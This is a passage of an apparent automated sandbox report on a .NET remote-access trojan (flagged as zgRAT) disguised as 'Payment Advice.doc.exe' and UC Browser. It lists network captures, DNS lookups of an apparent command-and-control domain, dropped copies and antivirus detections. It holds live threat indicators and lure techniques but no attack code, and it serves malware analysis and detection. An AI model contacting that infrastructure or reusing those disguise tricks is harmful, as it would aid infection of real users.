                      .reloc0x1780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x1681300xe3d0data
                      RT_GROUP_ICON0x1765000x14data
                      RT_VERSION0x1765140x3b4data
                      RT_MANIFEST0x1768c80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Version Infos

                      DescriptionData
                      Translation0x0000 0x04b0
                      LegalCopyrightCopyright 2008-2014 UCWeb Inc. All rights reserved.
                      Assembly Version6.0.1308.1016
                      InternalNameBrdbffygq.exe
                      FileVersion6.0.1308.1016
                      CompanyNameUCWeb Inc.
                      LegalTrademarks
                      CommentsUC Browser
                      ProductNameUC Browser
                      ProductVersion6.0.1308.1016
                      FileDescriptionUC Browser
                      OriginalFilenameBrdbffygq.exe

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 11, 2022 03:06:04.353975058 CEST49697443192.168.2.340.126.31.143
                      May 11, 2022 03:06:04.463157892 CEST49698443192.168.2.340.126.31.143
                      May 11, 2022 03:06:14.839580059 CEST49739443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.839622021 CEST4434973940.126.31.4192.168.2.3
                      May 11, 2022 03:06:14.839729071 CEST49739443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.840393066 CEST49739443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.840420008 CEST4434973940.126.31.4192.168.2.3
                      May 11, 2022 03:06:14.870450020 CEST49740443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.870507956 CEST4434974040.126.31.4192.168.2.3
                      May 11, 2022 03:06:14.870601892 CEST49740443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.870810032 CEST49740443192.168.2.340.126.31.4
                      May 11, 2022 03:06:14.870834112 CEST4434974040.126.31.4192.168.2.3
                      May 11, 2022 03:06:16.373502016 CEST49745443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.373572111 CEST4434974540.126.31.4192.168.2.3
                      May 11, 2022 03:06:16.373769999 CEST49745443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.374522924 CEST49745443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.374557018 CEST4434974540.126.31.4192.168.2.3
                      May 11, 2022 03:06:16.574666977 CEST49746443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.574732065 CEST4434974640.126.31.4192.168.2.3
                      May 11, 2022 03:06:16.574841022 CEST49746443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.575196981 CEST49746443192.168.2.340.126.31.4
                      May 11, 2022 03:06:16.575227022 CEST4434974640.126.31.4192.168.2.3
                      May 11, 2022 03:06:24.887613058 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:24.887687922 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:25.230577946 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:25.266520023 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:25.839941025 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:25.871114969 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:26.653918028 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654047966 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654108047 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654155970 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654195070 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654223919 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654241085 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654269934 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654283047 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.654299974 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.671010017 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671063900 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671092033 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671117067 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671144962 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671170950 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671197891 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671232939 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671258926 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671284914 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671309948 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671335936 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671396017 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671421051 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671447039 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671567917 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671597004 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671621084 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671647072 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671673059 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671757936 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671782970 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671869993 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671957016 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.671982050 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672072887 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672100067 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672147989 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672277927 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672305107 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672328949 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672404051 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672432899 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672458887 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672523022 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672549009 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672565937 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.672574997 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672712088 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672736883 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672764063 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672791004 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672873974 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672900915 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672926903 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672950983 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.672976017 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673021078 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673042059 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:26.673049927 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673110008 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673137903 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673233032 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673258066 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673284054 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673310041 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673369884 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673396111 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673521042 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673547983 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673572063 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673645020 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673671007 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673743010 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673768997 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.673791885 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.712409019 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:26.712564945 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:27.043154001 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:27.074428082 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:29.543390036 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:29.574517012 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:31.772969961 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773134947 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773191929 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773227930 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773267031 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773292065 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773308039 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773329020 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773339987 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.773351908 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.790204048 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790260077 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790316105 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790342093 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790365934 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790391922 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790420055 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790445089 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790472031 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790498018 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790522099 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790548086 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790572882 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790601969 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790628910 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790652990 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790678978 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790704012 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790734053 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790759087 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790782928 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790810108 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790837049 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790898085 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.790923119 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791028023 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791058064 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791084051 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791110039 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791136026 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791161060 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791212082 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.791270971 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791299105 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791332006 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791357994 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791384935 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791480064 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791507006 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791593075 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791623116 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791646004 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791691065 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791718006 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791763067 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791790009 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791865110 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791946888 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.791975975 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792001963 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792030096 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792056084 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792082071 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792126894 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792129040 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:31.792154074 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792216063 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792300940 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792327881 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792352915 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792421103 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792448044 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792540073 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792566061 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.792665005 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.841126919 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:31.841378927 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:34.543778896 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:34.582180023 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:36.871227980 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871320963 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871371031 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871582031 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871714115 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871779919 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871840954 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871932030 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.871997118 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.888206959 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888238907 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888258934 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888281107 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888314962 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888340950 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888355017 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888375044 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888392925 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888410091 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888434887 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888449907 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888463974 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888493061 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888531923 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.888562918 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888581991 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888632059 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888648987 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888663054 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888676882 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888870955 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888951063 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888967991 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888982058 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.888995886 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889147997 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889164925 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889180899 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889194012 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889269114 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889283895 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889348984 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889425039 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889441013 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889496088 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.889497042 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889514923 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889528990 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889628887 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889708996 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889724016 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889738083 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.889753103 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.890433073 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.896222115 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:36.934336901 CEST44349702204.79.197.200192.168.2.3
                      May 11, 2022 03:06:36.934492111 CEST49702443192.168.2.3204.79.197.200
                      May 11, 2022 03:06:44.232111931 CEST4967280192.168.2.3173.222.108.210
                      May 11, 2022 03:06:44.263323069 CEST4967380192.168.2.393.184.220.29
                      May 11, 2022 03:06:46.889029980 CEST49739443192.168.2.340.126.31.4
                      May 11, 2022 03:06:46.889048100 CEST49740443192.168.2.340.126.31.4
                      May 11, 2022 03:06:46.889143944 CEST49745443192.168.2.340.126.31.4
                      May 11, 2022 03:06:46.889245033 CEST49746443192.168.2.340.126.31.4
                      May 11, 2022 03:06:54.842860937 CEST49690443192.168.2.323.201.249.71
                      May 11, 2022 03:06:54.860078096 CEST4434969023.201.249.71192.168.2.3
                      May 11, 2022 03:06:54.860130072 CEST4434969023.201.249.71192.168.2.3
                      May 11, 2022 03:06:54.860362053 CEST49690443192.168.2.323.201.249.71
                      May 11, 2022 03:06:54.861674070 CEST49690443192.168.2.323.201.249.71
                      May 11, 2022 03:06:56.520144939 CEST804970193.184.220.29192.168.2.3
                      May 11, 2022 03:06:56.520397902 CEST4970180192.168.2.393.184.220.29
                      May 11, 2022 03:06:56.659538984 CEST4970380192.168.2.3173.222.108.226
                      May 11, 2022 03:06:56.676443100 CEST8049703173.222.108.226192.168.2.3
                      May 11, 2022 03:06:56.676599026 CEST4970380192.168.2.3173.222.108.226
                      May 11, 2022 03:06:56.677292109 CEST804970495.140.230.128192.168.2.3
                      May 11, 2022 03:06:56.677402020 CEST4970480192.168.2.395.140.230.128
                      May 11, 2022 03:06:56.886511087 CEST49699443192.168.2.323.211.5.146
                      May 11, 2022 03:06:56.886795998 CEST4970080192.168.2.313.107.4.50
                      May 11, 2022 03:06:56.886902094 CEST4970180192.168.2.393.184.220.29
                      May 11, 2022 03:06:58.083158970 CEST804970593.184.220.29192.168.2.3
                      May 11, 2022 03:06:58.085788012 CEST4970580192.168.2.393.184.220.29
                      May 11, 2022 03:07:57.601119995 CEST4977649703192.168.2.3172.111.216.19
                      May 11, 2022 03:07:59.432576895 CEST4434969213.107.42.16192.168.2.3
                      May 11, 2022 03:07:59.523288965 CEST804970593.184.220.29192.168.2.3
                      May 11, 2022 03:07:59.526835918 CEST4970580192.168.2.393.184.220.29
                      May 11, 2022 03:08:00.769761086 CEST4977649703192.168.2.3172.111.216.19
                      May 11, 2022 03:08:02.270767927 CEST4434969113.107.5.88192.168.2.3
                      May 11, 2022 03:08:04.325846910 CEST4434969313.107.5.88192.168.2.3
                      May 11, 2022 03:08:05.278270006 CEST804970593.184.220.29192.168.2.3
                      May 11, 2022 03:08:05.278379917 CEST4970580192.168.2.393.184.220.29
                      May 11, 2022 03:08:06.770391941 CEST4977649703192.168.2.3172.111.216.19
                      May 11, 2022 03:08:28.470340014 CEST4980049703192.168.2.3172.111.216.19
                      May 11, 2022 03:08:31.395839930 CEST4980849703192.168.2.3172.111.216.19
                      May 11, 2022 03:08:31.475507975 CEST4980049703192.168.2.3172.111.216.19

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 11, 2022 03:07:56.095010042 CEST5077853192.168.2.38.8.8.8
                      May 11, 2022 03:07:56.281054974 CEST53507788.8.8.8192.168.2.3
                      May 11, 2022 03:08:28.289633989 CEST5540353192.168.2.38.8.8.8
                      May 11, 2022 03:08:28.467470884 CEST53554038.8.8.8192.168.2.3
                      May 11, 2022 03:08:31.245327950 CEST5849753192.168.2.38.8.8.8
                      May 11, 2022 03:08:31.390989065 CEST53584978.8.8.8192.168.2.3

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      May 11, 2022 03:07:56.095010042 CEST192.168.2.38.8.8.80x9374Standard query (0)chongmei33.myddns.rocksA (IP address)IN (0x0001)
                      May 11, 2022 03:08:28.289633989 CEST192.168.2.38.8.8.80xc0d7Standard query (0)chongmei33.myddns.rocksA (IP address)IN (0x0001)
                      May 11, 2022 03:08:31.245327950 CEST192.168.2.38.8.8.80x2a01Standard query (0)chongmei33.myddns.rocksA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      May 11, 2022 03:06:38.513480902 CEST8.8.8.8192.168.2.30x9b78No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                      May 11, 2022 03:06:48.970422029 CEST8.8.8.8192.168.2.30x513eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                      May 11, 2022 03:06:56.814696074 CEST8.8.8.8192.168.2.30x98adNo error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)
                      May 11, 2022 03:06:56.814696074 CEST8.8.8.8192.168.2.30x98adNo error (0)windowsupdatebg.s.llnwi.net95.140.230.128A (IP address)IN (0x0001)
                      May 11, 2022 03:07:56.281054974 CEST8.8.8.8192.168.2.30x9374No error (0)chongmei33.myddns.rocks172.111.216.19A (IP address)IN (0x0001)
                      May 11, 2022 03:08:28.467470884 CEST8.8.8.8192.168.2.30xc0d7No error (0)chongmei33.myddns.rocks172.111.216.19A (IP address)IN (0x0001)
                      May 11, 2022 03:08:31.390989065 CEST8.8.8.8192.168.2.30x2a01No error (0)chongmei33.myddns.rocks172.111.216.19A (IP address)IN (0x0001)

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:03:06:08
                      Start date:11/05/2022
                      Path:C:\Users\user\Desktop\Payment Advice.doc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\Payment Advice.doc.exe"
                      Imagebase:0xf30000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low

                      General

                      Target ID:11
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                      Imagebase:0xc20000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:12
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:13
                      Start time:03:06:36
                      Start date:11/05/2022
                      Path:C:\Windows\SysWOW64\timeout.exe
                      Wow64 process (32bit):true
                      Commandline:timeout 20
                      Imagebase:0x12c0000
                      File size:26112 bytes
                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:19
                      Start time:03:07:16
                      Start date:11/05/2022
                      Path:C:\Users\user\AppData\Local\word.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\word.exe"
                      Imagebase:0x310000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                      • Rule: Typical_Malware_String_Transforms, Description: Detects typical strings in a reversed or otherwise modified form, Source: C:\Users\user\AppData\Local\word.exe, Author: Florian Roth
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 41%, ReversingLabs
                      Reputation:low

                      General

                      Target ID:20
                      Start time:03:07:23
                      Start date:11/05/2022
                      Path:C:\Users\user\AppData\Local\word.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\word.exe"
                      Imagebase:0x390000
                      File size:1526784 bytes
                      MD5 hash:173ECAE1209E548D0DF71D631494B30D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
